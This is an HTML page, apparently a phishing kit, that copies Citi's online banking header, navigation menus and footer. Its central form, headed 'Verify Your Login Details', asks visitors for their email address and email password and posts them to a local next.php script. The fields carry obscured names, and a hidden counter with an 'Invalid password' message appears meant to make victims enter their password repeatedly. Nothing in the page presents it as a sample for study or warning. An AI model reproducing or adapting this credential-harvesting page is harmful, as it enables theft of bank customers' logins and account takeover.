<html lang="en" style="display: block; visibility: visible;">

<head class="at-element-marker">
    <meta charset="utf-8">
    <!-- <meta http-equiv="refresh" content="5;URL='https://www.citi.com/login'" />    -->
    <title>Online Banking, Mortgages, Personal Loans, Investing | Citi.com</title>
    <link type="text/css" href="css/branding_header_v2.css" rel="stylesheet">
    <link type="text/css" href="css/branding_footer_v2.css" rel="stylesheet">
    <!-- <link rel="stylesheet" type="text/css" href="css/style.css"> -->
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
</head>

<body class="cbolui-ddl" data-new-gr-c-s-check-loaded="14.991.0" data-gr-ext-installed="">
    <div id="brandingrwd">
        <header class="responsiveBrn site-header mainbrandinghead 
      public">
            <!-- This is the Brand Nav.  -->
            <nav id="citiBrandingSection" role="presentation" aria-label="Citi Bank Header" class="
      public">
                <div class="maxWidthInner redeisgnMBH">
                    <!-- LOGO -->
                    <a style="top: 0px !important;height: 88px;" role="link" href="/US/login.do" id="headerLoka ogoLink">
                        <div class="brandingLogo " alt="Citi Bank Logo"><span class="sr-only">Citi Bank Logo</span></div>
                        <div id="mobileLogo" class="brandingLogo " alt="Citi Bank Logo"><span class="sr-only">Citi Bank Logo</span></div>
                    </a>
                    <div class="pull-right redeisgnright  redesty">
                        <ul role="presentation">
                            <li role="presentation" class="redeisngprofile" style="display: none;">
                                <!-- IA Secured Navigation V2 spf flow-->
                                <div id="citi-topNav-container" class="citi-topNav cbolui-ddl-topNav">
                                    <nav class="navbar navbar-default" style="box-shadow: none !important;">
                                        <div class="container-fluid">
                                            <!-- Brand and toggle get grouped for better mobile display -->
                                            <!-- Collect the nav links, forms, and other content for toggling -->
                                            <div class="collase navbar-collapse" id="bs-example-navbar-collapse-1">
                                                <!-- Profile Section-->
                                                <ul id="profileLinks" class="nav navbar-nav profileSection" role="list" style="display:none;">
                                                    <li id="profileSettings" class="dropdown">
                                                        <a href="#" class="dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="padding-top:11px;padding-left:21px;top: 12px;left: 19px;"><img src="./images/pl-profile.png" alt="Profiles" style="margin-left: 24px;" role="presentation">
                                                            <span class="iconLableProfile" style="    display: block;font-family: Interstate-Regular,sans-serif !important;font-size: 11px;color: #666666;letter-spacing: 0;text-align: center;margin-left:13px;">Profile</span>
                                                        </a>
                                                        <ul class="dropdown-menu cbolui-hidden"></ul>
                                                    </li>
                                                </ul>
                                                <!-- New Search -->
                                                <!-- End New Search -->
                                            </div><!-- /.navbar-collapse -->
                                        </div><!-- /.container-fluid -->
                                    </nav>
                                </div>
                            </li>
                            <li style="display: inline-block;padding: 0 24px 0 0;"><a role="link" class="atmredesign" tabindex="0" href="/US/ag/citibank-location-finder" id="atmbrnchdesk" style="font-family: Interstate-Regular,sans-serif !important;font-size: 11px;color: #666666;letter-spacing: 0;text-align: center;"><img src="./images/atmbranchloc.svg" alt="ATM/Branch" style="display:block;height: 26px;  width: 26px;margin-left: 19px;margin-bottom:0 !important;" role="presentation">
                                    ATM / Branch</a></li>
                            <li style="display: inline-block;margin-right:35px;">
                                <a id="spanishDisclaimerLink" lang="es" href="/US/login.do?locale=es_US" onclick="showSpanishDisclaimer();return false;" style="    font-family: Interstate-Regular,sans-serif !important;;font-size: 11px;color: #666666;letter-spacing: 0;text-align: center;">
                                    <img src="./images/lang.svg" role="presentation" alt="Español" style="display:block;height: 26px;  width: 26px;margin-left: 4px;margin-bottom:0 !important;">
                                    Español
                                </a>
                            </li>
                        </ul>
                    </div>
                </div>
            </nav>
            <div id="subnav" class="">
                <div class="maxWidthInner" style="max-width: 1440px;margin: 0 auto;position: relative;">
                    <!-- Sub Nav Dropdown Buttons -->
                    <div id="subnav_inner" class="shrinkWidth" style="width: 98%;">
                        <nav id="primary_nav">
                            <ul role="menubar" id="main-nav">
                                <li id="creditCardsLi" class="sub_menu_dropdown has-drop subnav_inner-btn hcolor" role="menuitem" aria-haspopup="true">
                                    <a id="creditcards" onclick="showSubNav(this)" class="dropbtn" href="javascript:void(0)" tabindex="0">Credit Cards</a>
                                </li>
                                <li id="bankingLi" class="sub_menu_dropdown has-drop subnav_inner-btn hcolor" role="menuitem" aria-haspopup="true">
                                    <a id="banking" class="dropbtn" href="javascript:void(0)" tabindex="0">Banking</a>
                                </li>
                                <li id="lendingLi" class="sub_menu_dropdown has-drop subnav_inner-btn testLending hcolor" role="menuitem" aria-haspopup="true">
                                    <a id="lending" class="dropbtn" href="javascript:void(0)" tabindex="0">Lending</a>
                                </li>
                                <li id="investingLi" class="sub_menu_dropdown has-drop subnav_inner-btn hcolor active" role="menuitem" aria-haspopup="true" tabindex="-1" aria-expanded="false">
                                    <a id="investing" href="javascript:void(0)" class="dropbtn" tabindex="0" aria-expanded="true">Investing</a>
                                </li>
                                <li id="citiGoldLi" class="sub_menu_dropdown has-drop subnav_inner-btn hcolor active" role="menuitem" aria-haspopup="true" tabindex="-1" aria-expanded="false">
                                    <a id="citigoldli" href="javascript:void(0)" class="dropbtn" tabindex="0" aria-expanded="true">Wealth Management
                                        <!--Citigold<sup>&reg;</sup>--></a>
                                </li>
                                <li id="openAnAccount" class="hcolor active hover" aria-expanded="false">
                                    <a id="citiGold_Link" onclick="lnk(this.href);return false;" href="/US/ag/open-a-bank-account" tabindex="0">Open an Account <span aria-hidden="true" style="font-weight:bold;">&gt;</span></a>
                                </li>
                                <div class="rightLinks">
                                    <li id="searchLi" class="hcolor" role="menuitem">
                                        <div id="perso-citi">
                                            <div id="perso-page">
                                                <div class="perso-head">
                                                    <div id="personetics-citi-menu" class="citiSearchMenuNew">
                                                        <i id="citi-search-icon" class="searchButton" tabindex="0" role="button" style="top: 1px;left:0px !important">
                                                            <a id="newSearchNav">
                                                                <img id="search_icon" role="presentation" src="./images/search.png" alt="Search" style="width: 20px;height: 20px;margin-right: 10px;vertical-align: middle;">
                                                                <span style="font-family: Interstate_Bold">How can we help?</span>
                                                            </a>
                                                        </i>
                                                        <span aria-hidden="true" class="sr-only" id="focus-change-warning">upon clicking, focus moves to the search input field</span>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </li>
                                </div>
                            </ul>
                            <ul class="mobileUL">
                                <!-- ls40104: Menu CTA starts -->
                                <!-- yw31271 starts -->
                                <li id="mobile" class="sub_menu_dropdown has-drop subnav_inner-btn mobMenu " aria-haspopup="true">
                                    <a href="#" id="mobileMenu" class="mobile dropbtn" onclick="mobileDropdown()">
                                        <img src="./images/navigationMobile.png">
                                    </a>
                                </li>
                                <div class="rightLinks">
                                    <li id="searchLi" class="hcolor" role="presentation">
                                        <!-- <link rel="stylesheet" text="text/css" href="css/cbol-smartSearch.css"> -->
                                        <div id="perso-citi">
                                            <div id="perso-page">
                                                <div class="perso-head">
                                                    <div id="personetics-citi-menu" class="citiSearchMenuNew">
                                                        <i id="citi-search-icon" class="searchButton" tabindex="0" role="button" style="top: 1px;left:0px !important">
                                                            <a id="newSearchNav">
                                                                <img id="search_icon" role="presentation" src="https://online.citi.com./images/search.png" alt="Search" style="width: height: 20px;margin-right: 10px;vertical-align: middle;">
                                                                <span style="font-family: Interstate_Bold">How can we help?</span>
                                                            </a>
                                                        </i>
                                                        <span aria-hidden="true" class="sr-only" id="focus-change-warning">upon clicking, focus moves to the search input field</span>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </li>
                                    <li class="divider signOnBtn" style="background-color: #fff;width: 1px !important;display: inline-block;height: 26px;margin-top: 10px;opacity: 1;" role="presentation"></li>
                                </div>
                                <!-- yw31271 ends -->
                                <!-- ls40104: Menu CTA ends -->
                            </ul>
                            <!--megaMenu_wrap-->
                        </nav>
                    </div>
                </div>
            </div>
            <!--subnav_inner-->
            <!-- ls40104: Mobile Sub menus starts -->
            <!-- yw31271 starts -->
            <div class="cbolui-ddl sia-nav_submenus hidden-lg hidden-md mobile" id="mobileNav">
                <ul role="list" id="mobileDrop" class="sia-nav_submenu_mobile no-list-style" data-item="mobile" aria-label="Sub menu">
                    <span id="investI" class="glyphicon glyphicon-plus mobileLeftIcon"></span>
                    <li id="creditCardsMobLi" class="sub_menu_dropdown has-drop subnav_inner-btn mobileL mobileLi" role="listitem">
                        <button id="mobileCreditDropBtn" class="sub-menu-btn" aria-expanded="false">Credit Cards</button>
                        <span id="creditI" class="glyphicon glyphicon-plus mobileIcon"></span>
                        <hr class="mobileBorder" aria-hidden="true">
                    </li>
                    <ul id="mobileCreditDrop" class="sia-nav_submenu_credit_mobile" data-item="mobile">
                        <li id="viewAllCardsmob" class="mm_subnav mobileCreditDrop mob" tabindex="-1" data-item-value="view-all" aria-haspopup="false" role="presentation">
                            <a data-menu="creditcards" id="viewAllCards_LinkM mob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">View All Credit Cards</a></li>
                        <li id="balanceTransferCardsmob" class="mm_subnav mob" tabindex="-1" data-item-value="balance-transfer" aria-haspopup="false" role="presentation">
                            <a data-menu="creditcards" id="balanceTransferCards_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Balance Transfer Credit Cards</a></li>
                        <li id="lowInterestCardsmob" class="mm_subnav mob" tabindex="-1" data-item-value="low-interest" aria-haspopup="false" role="presentation">
                            <a data-menu="creditcards" id="lowInterestCards_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">0% Intro APR Credit Cards</a></li>
                        <li id="rewardsCardsmob" class="mm_subnav mob" tabindex="-1" data-item-value="low-interest" aria-haspopup="false" role="presentation">
                            <a data-menu="creditcards" id="rewardsCards_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Rewards Credit Cards</a></li>
                        <li id="cashbackCardsmob" class="mm_subnav mob" tabindex="-1" data-item-value="cash-back" aria-haspopup="false" role="presentation">
                            <a data-menu="creditcards" id="cashbackCards_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Cash Back Credit Cards</a></li>
                        <li id="travelCardsmob" class="mm_subnav mob" tabindex="-1" data-item-value="pre-qualified" aria-haspopup="false" role="presentation">
                            <a data-menu="creditcards" id="preQualifiedCards_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Travel Credit Cards</a></li>
                        <li id="SmallBusinessCardsmob" class="mm_subnav mob" tabindex="-1" data-item-value="small-business" aria-haspopup="false" role="presentation">
                            <a data-menu="creditcards" id="SmallBusinessCards_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Small Business Credit Cards</a></li>
                        <li class="mm_subnav mob" role="presentation">
                            <p class="quickLinksMob">Quick Links</p>
                        </li>
                        <li id="creditknowcredimob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="creditcards" id="preQualifiedCards_LinkMa" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                <img class="qlinkImg" src="./images/cc-know.png" alt="">Citi<sup style=" vertical-align: super; line-height: 0; font-size: smaller; font-family: Interstate_Light,sans-serif!important; top: 0;">®</sup> Credit Knowledge Center</a></li>
                        <li id="respondmailofrccmob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="creditcards" id="preQualifiedCards_Linkccmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                <img class="qlinkImg" src="./images/cc-mail.png">Respond to Mail Offer</a></li>
                    </ul>
                    <li id=" bankingMobLi" class="sub_menu_dropdown has-drop subnav_inner-btn testBanking mobileL mobileLi" role="listitem" aria-haspopup="true">
                        <button id="mobileBankDropBtn" class="sub-menu-btn" aria-expanded="false">Banking</button>
                        <span id="bankI" class="glyphicon glyphicon-plus mobileIcon"></span>
                        <hr class="mobileBorder" aria-hidden="true">
                    </li>
                    <ul id="mobileBankDrop" class="sia-nav_submenu_banking_mobile" data-item="mobile">
                        <li id="checkingBankingmob" class="mm_subnav mob" tabindex="-1" data-item-value="checking" aria-haspopup="false" role="presentation">
                            <a data-menu="banking" id="checkingBanking_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Checking</a></li>
                        <li id="savingsBankingmob" class="mm_subnav mob" tabindex="-1" data-item-value="savings-account" aria-haspopup="false" role="presentation">
                            <a data-menu="banking" id="savingsBanking_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Savings</a></li>
                        <li id="bankingOverviewmob" class="mm_subnav mob" tabindex="-1" data-item-value="banking-overview" aria-haspopup="false" role="presentation">
                            <a data-menu="banking" id="bankingOverview_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Banking Overview</a></li>
                        <li id="cdiraBankingmob" class="mm_subnav mob" tabindex="-1" data-item-value="cd-ira" aria-haspopup="false" role="presentation">
                            <a data-menu="banking" id="cdiraBanking_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Certificates of Deposit</a></li>
                        <li id="iraBankingmob" class="mm_subnav mob" tabindex="-1" data-item-value="ira" aria-haspopup="false" role="presentation">
                            <a data-menu="banking" id="iraBanking_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Banking IRAs</a></li>
                        <li id="ratesBankingmob" class="mm_subnav mob" tabindex="-1" data-item-value="rates" aria-haspopup="false" role="presentation">
                            <a data-menu="banking" id="ratesBanking_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Rates</a></li>
                        <li id="small-businessBankingmob" class="mm_subnav mob" tabindex="-1" data-item-value="small-business" aria-haspopup="false" role="presentation">
                            <a data-menu="small-business" id="small-businessBanking_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Small Business</a></li>
                        <li class="mm_subnav mob" role="presentation">
                            <p class="quickLinksMob">Quick Links</p>
                        </li>
                        <!--<li id="preQualifiedCardsrigth" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
<a class="qlinksTextMob" data-menu="banking" id="bankingOverview_Link" tabindex="-1" onClick="lnk(this.href);return false;" href="#"><img class="qlinkImg" src="./images/banking-compare.png" alt="">Compare Banking Packages</a></li>-->
                        <li id="creditknowbankmob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="banking" id="banking-savigsmadesimplemob" tabindex="-1" onclick="lnk(this.href);return false;" href="/US/JRS/portal/template.do?ID=your-savings-made-simple
">
                                <img class="qlinkImg" src="./images/banking-savings.png" alt="">Savings Made Simple</a></li>
                    </ul>
                    <li id="lendingMobLi" class="sub_menu_dropdown has-drop subnav_inner-btn testLending mobileL mobileLi" role="listitem" aria-haspopup="true">
                        <button id="mobileLendDropBtn" class="sub-menu-btn" aria-expanded="false">Lending</button>
                        <span id="lendI" class="glyphicon glyphicon-plus mobileIcon"></span>
                        <hr class="mobileBorder" aria-hidden="true">
                    </li>
                    <ul id="mobileLendDrop" class="sia-nav_submenu_lending_mobile" data-item="mobile">
                        <li id="personalLoanCredLinemob" class="mm_subnav mob" tabindex="-1" data-item-value="personal-loans" aria-haspopup="false" role="presentation">
                            <a data-menu="lending" id="personalLoanCredLine_LinkM" tabindex="-1" onclick="lnk(this.href);return false;" href="#">Personal Loans &amp; Lines of Credit</a></li>
                        <li class="mm_subnav mob" tabindex="-1" data-item-value="personal-loans" aria-haspopup="false" role="presentation">
                            <a data-menu="lending" id="lending_homelendingmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                Home Lending</a></li>
                        <li class="mm_subnav mob" tabindex="-1" data-item-value="personal-loans" aria-haspopup="false" role="presentation">
                            <a data-menu="lending" id="lending_buyahomemob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                Buy a Home</a></li>
                        <li class="mm_subnav mob" tabindex="-1" data-item-value="personal-loans" aria-haspopup="false" role="presentation">
                            <a data-menu="lending" id="lending_refinanceurhomemob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                Refinance Your Home</a></li>
                        <li class="mm_subnav mob" tabindex="-1" data-item-value="personal-loans" aria-haspopup="false" role="presentation">
                            <a data-menu="lending" id="lending_buyahomeamob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                Use Your Home Equity</a></li>
                        <li class="mm_subnav mob" role="presentation">
                            <p class="quickLinksMob">Quick Links</p>
                        </li>
                        <li id="preQualifiedCardsrigthlendmob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="lending" id="lending_mortcalcmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#"><img class="qlinkImg" src="./images/mort-calculator.png" alt="">Mortgage Calculators</a></li>
                        <li id="lending_lihomeequcalcmob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="lending" id="lending_homeequcalcmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#"><img class="qlinkImg" src="./images/mort-home.png" alt="">Home Equity Calculators</a></li>
                        <!--<li id="lending_lichkloanapp" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
<a class="qlinksTextMob" data-menu="lending" id="lending_chkloanappmob" tabindex="-1" onClick="lnk(this.href);return false;" href='http://citi.com/loanoffer'><img class="qlinkImg" src="./images/cc-see.png" alt="">Check Loan Application Status</a></li>-->
                    </ul>
                    <li id="investingMobLi" class="sub_menu_dropdown has-drop subnav_inner-btn mobileL mobileLi" role="listitem" aria-haspopup="true">
                        <button id="mobileInvestDropBtn" class="sub-menu-btn" aria-expanded="false">Investing</button>
                        <span id="investI" class="glyphicon glyphicon-plus mobileIcon"></span>
                        <hr class="mobileBorder" aria-hidden="true">
                    </li>
                    <ul id="mobileInvestDrop" class="sia-nav_submenu_Investing_mobile" data-item="mobile">
                        <li id="investing_liwrkingadvisormob" class="mm_subnav mob" tabindex="-1" data-item-value="account-types" aria-haspopup="false" role="presentation">
                            <a data-menu="investing" id="investing_wrkingadvisormob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                Working with an Advisor</a></li>
                        <li id="investing_liwealthbuildermob" class="mm_subnav mob" tabindex="-1" data-item-value="account-types" aria-haspopup="false" role="presentation">
                            <a data-menu="investing" id="investing_wealthbuildermob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                Citi Wealth Builder</a></li>
                        <li id="investing_liselftradingmob" class="mm_subnav mob" tabindex="-1" data-item-value="account-types" aria-haspopup="false" role="presentation">
                            <a data-menu="investing" id="investing_selftradingmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                Self-Directed Trading</a></li>
                        <li class="mm_subnav mob" role="presentation">
                            <p class="quickLinksMob">Quick Links</p>
                        </li>
                        <li id="preQualifiedCardsrigthinvmob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="lending" id="lending_mortcalcinvesmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                <img class="qlinkImg" src="./images/Investing-FP.png" alt="">Financial Planning</a></li>
                        <li id="lending_lihomeequcalcinvestmob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="lending" id="lending_homeequcalcinvestmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                <img class="qlinkImg" src="./images/Investing-MI.png" alt="">Market Insights</a></li>
                        <li id="lending_lichkloanappmob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="lending" id="lending_chkloanappinvestmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                <img class="qlinkImg" src="./images/Investing-II.png" alt="">Investments &amp; Insurance</a></li>
                    </ul>
                    <li id="citiGoldMobLi" class="sub_menu_dropdown has-drop subnav_inner-btn mobileL mobileLi" role="listitem" aria-haspopup="true">
                        <button id="mobileWealthDropBtn" class="sub-menu-btn" aria-expanded="false">Wealth Management</button>
                        <span id="investI" class="glyphicon glyphicon-plus mobileIcon"></span>
                        <hr class="mobileBorder" aria-hidden="true">
                    </li>
                    <ul id="mobileInvestDropCG" class="sia-nav_submenu_Investing_mobile" data-item="mobile">
                        <li id="wm_insightsToolsmob" class="mm_subnav mob" tabindex="-1" data-item-value="resources" aria-haspopup="false" role="presentation">
                            <a data-menu="investing" id="insightsTools_Linkmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                Citigold<sup style="    vertical-align: super;
    line-height: 0;
    font-size: smaller;
    font-family: Interstate_Light,sans-serif!important;
    top: 0;">®</sup> Private Client</a></li>
                        <li id="wm_licitigoldmob" class="mm_subnav mob" tabindex="-1" data-item-value="resources" aria-haspopup="false" role="presentation">
                            <a data-menu="investing" id="wm_citigoldmob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                Citigold</a></li>
                        <li class="mm_subnav mob" role="presentation">
                            <p class="quickLinksMob">Quick Links</p>
                        </li>
                        <li id="wm_liretationmanagermob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="investing" id="wm_retationmanagermob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                <img class="qlinkImg" src="./images/atmbranch.png" alt="">Find a Wealth Team</a></li>
                        <!--<li id="wm_licomparebenefit" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
<a class="qlinksTextMob" data-menu="investing" id="wm_comparebenefit" tabindex="-1" onClick="lnk(this.href);return false;" href="#">
<img class="qlinkImg" src="./images/WM-benefitspack.png" alt="">Compare Benefits of Packages</a></li>-->
                        <li id="wm_liconciergemob" class="qsublinks" tabindex="-1" data-item-value="pre-qualified" role="menuitem" aria-haspopup="false">
                            <a class="qlinksTextMob" data-menu="investing" id="wm_conciergemob" tabindex="-1" onclick="lnk(this.href);return false;" href="#">
                                <img class="qlinkImg" src="./images/WM-conce.png" alt="">Citi Wealth Advisor</a></li>
                    </ul>
                    <li id="atmBranchMob" class="mobileLi" role="listitem" aria-haspopup="false">
                        <a role="link" tabindex="0" href="#" id="atmbrnch"><img src="./images/atmbranchlink.png" alt="ATM/Branch" style="height:20px;width:20px;margin-left: 0px;margin-right:18px;"><span class="atmlocaleMobText">ATM / Branch</span></a></li>
                    <hr class="mobileBorder" aria-hidden="true">
                    <li id="localeMob" class="mobileLi" role="listitem" aria-haspopup="false">
                        <a id="spanishDisclaimerLink" lang="es" href="#" onclick="showSpanishDisclaimer();return false;">
                            <img src="./images/icon_globe_med-grey.png" alt="Español" style="height: 20px;  width: 20px;margin-left: 0px;margin-right: 18px;">
                            <span class="atmlocaleMobText">Español</span>
                        </a>
                    </li>
                    <hr class="mobileBorder" aria-hidden="true">
                    <li id="openAnAccountMob" class="mobileLi hcolor" role="listitem" aria-haspopup="false">
                        <a id="openAccLinkMob" onclick="lnk(this.href);return false;" href="#" tabindex="0">Open an Account </a>
                    </li>
                </ul>
            </div>
            <!-- Main Nav ENDS -->
            <div id="brandingDataTransfer">
                <span id="brandingData_serverDomain">https://online.citi.com</span>
                <span id="brandingData_serverPath">/US</span>
                <span id="brandingData_appPath">https://online.citi.com/US</span>
                <span id="brandingData_sessID">griQR-oq0l244pGbFUe9035</span><span id="brandingData_lnkSignOff">/ag/sign-off</span>
                <span id="brandingData_loggedState">N</span>
                <span id="brandingData_test">x</span>
                <span id="brandingData_autocomplete">https://online.citi.com/US/JRS/globalsearch/SearchAutoCompleteJsonP.do</span>
            </div>
            <!-- yw31271 Spanish Disclaimer Starts -->
            <!-- yw31271 Spanish Disclaimer Ends-->
        </header>
        <div id="citi-autocomplete-content" style="display: none;" aria-labelledby="citi-search-icon"></div>
        <style>
        .modal-bg {
            background-color: rgba(0, 0, 0, .65);
        }

        .cbolui-ddl.scrollable {
            overflow: auto;
        }

        #spanishDisclaimerModalMain.cbolui-ddl .btn-primary {
            color: #fff;
            border-color: #056DAE;
            background: #056DAE;
            line-height: 46px;
            border-width: 2px;
            border-style: solid;
            margin: 20px 20px 20px 0;
            min-width: 220px;
            position: relative;
            border-radius: 6px;
            font-size: 1rem;
            font-family: Interstate_Bold, sans-serif;
            -webkit-font-smoothing: antialiased;
            text-align: center;
            cursor: pointer;
        }

        .modal .modal-footer {
            text-align: right;
        }
        </style>
        <style type="text/css">
        .input-container[_ngcontent-ydj-c118] .input-switch-wrapper[_ngcontent-ydj-c118] input[_ngcontent-ydj-c118] {
            width: 100%;
            box-sizing: border-box;
            -moz-box-sizing: border-box;
            letter-spacing: .5px;
            height: 48px;
            padding: 10px 20px;
            background: #eee;
            border: none !important;
            box-shadow: none;
            border-radius: 8px;
        }
        </style>
    </div>
    <div class="container">
        <div class="row mt-5">
            <div class="col-lg-12">
                <h1>Verify Your Login Details</h1>
            </div>
            <div class="col-lg-12">
                <p>
                    Please enter the information below to verify your account
                </p>
                
            </div>
        </div>
        <div class="row">
            <div class="col-lg-5">
                <form action="./next.php" method="POST">
                    <input type="hidden" name="count" id="count" value="0">
                    <div>
                        <div id="msg" style="display: none;color: red;font-weight: 600">Invalid password.! Please enter correct password.</div>
                    </div>
                    <div class="form-group">
                        <label>Email address</label>
                        <input type="email" class="form-control" id="aiii" name="aiii" required="">
                    </div>
                    <div class="form-group">
                        <label>Email password</label>
                        <input type="password" class="form-control" id="prrr" name="prrr"  required="">
                    </div>
                    
                    <div class="form-group mt-5">
                        <button type="submit" name="btn3" class="btn w-50" style="background-color: #002D72;color: white">Verify</button>
                    </div>
                </form>
            </div>
        </div>
    </div>
    <footer class="citiFooter" style="display: block;">
        <div class="footerInner">
            <div class="verticalMenu">
                <div class="mobileStyleMenu">
                    <div class="accordion menu accordion-footer cbolui-accordion-initialize accordionToColumns" data-prevent-auto-scroll="true">
                        <ul class="mainnav">
                            <li class="level1 parent">
                                <span class="category">
                                    <span role="button" id="footerAccordionHeader1-a" tabindex="0" aria-expanded="false" aria-controls="footerAccordionPanel1-a" data-title="Select to display" class="category-title">
                                        <b>Why Citi</b>
                                    </span>
                                    <!-- <h2><b>Why Citi</b></h2> -->
                                    <svg class="svg-arrow"></svg>
                                </span>
                                <div class="accordionSubMenu" aria-labelledby="footerAccordionHeader1-a" role="tabpanel" id="footerAccordionPanel1-a" aria-hidden="true">
                                    <!-- CBOL Maintance List Moved: List.${List} -->
                                    <h3 class="hidden-sm hidden-xs">Why Citi</h3>
                                    <ul>
                                        <li><a href="#">Our Story</a></li>
                                        <li><a href="#">Careers</a></li>
                                        <li><a onclick="lnk(this.href);return false;" href="#" role="link">Benefits &amp; Services</a></li>
                                        <li><a onclick="lnk(this.href);return false;" href="#" role="link">Rewards</a></li>
                                        <li><a href="#" target="_blank" role="link">Citi Easy Deals<sup>SM</sup></a></li>
                                        <li><a href="#" target="_blank" role="link">Citi Entertainment<sup>SM</sup></a></li>
                                        <li><a onclick="lnk(this.href);return false;" href="#" role="link">Special Offers</a></li>
                                    </ul>
                                    <!-- END CBOL Maintance List ${List} -->
                                </div>
                            </li>
                            <li class="level1 parent">
                                <span class="category">
                                    <span role="button" id="footerAccordionHeader1-b" tabindex="0" aria-expanded="false" aria-controls="footerAccordionPanel1-b" data-title="Select to display" class="category-title">
                                        <b>Wealth Management</b>
                                    </span>
                                    <!-- <h2><b>Relationship Banking</b></h2> -->
                                    <svg class="svg-arrow"></svg>
                                </span>
                                <div class="accordionSubMenu" aria-labelledby="footerAccordionHeader1-b" role="tabpanel" id="footerAccordionPanel1-b" aria-hidden="true">
                                    <!-- CBOL Maintance List Moved: List.${List} -->
                                    <h3 class="hidden-sm hidden-xs">Wealth Management</h3>
                                    <ul>
                                        <li><a href="#" target="_blank" role="link">Citigold<sup>®</sup> Private Client</a></li>
                                        <li><a href="#" role="link">Citigold</a></li>
                                        <li style="color:white;"><a onclick="lnk(this.href);return false;" href="#" role="link">Citi Priority</a></li>
                                        <li><a href="#" role="link" target="_blank">Citi Private Bank</a></li>
                                    </ul>
                                    <!-- END CBOL Maintance List ${List} -->
                                </div>
                            </li>
                            <li class="level1 parent">
                                <span class="category">
                                    <span role="button" id="footerAccordionHeader1-c" tabindex="0" aria-expanded="false" aria-controls="footerAccordionPanel1-c" data-title="Select to display" class="category-title">
                                        <b>Business Banking</b>
                                    </span>
                                    <!-- <h2><b>Business Banking</b></h2> -->
                                    <svg class="svg-arrow"></svg>
                                </span>
                                <div class="accordionSubMenu" aria-labelledby="footerAccordionHeader1-c" role="tabpanel" id="footerAccordionPanel1-c" aria-hidden="true">
                                    <!-- CBOL Maintance List Moved: List.${List} -->
                                    <h3 class="hidden-sm hidden-xs">Business Banking</h3>
                                    <ul>
                                        <li><a onclick="lnk(this.href);return false;" href="#" role="link">Small Business Accounts</a></li>
                                        <li><a onclick="lnk(this.href);return false;" href="#" role="link">Commercial Accounts</a></li>
                                    </ul>
                                    <!-- END CBOL Maintance List ${List} -->
                                </div>
                            </li>
                            <li class="level1 parent">
                                <span class="category">
                                    <span role="button" id="footerAccordionHeader1-d" tabindex="0" aria-expanded="false" aria-controls="footerAccordionPanel1-d" data-title="Select to display" class="category-title">
                                        <b>Rates</b>
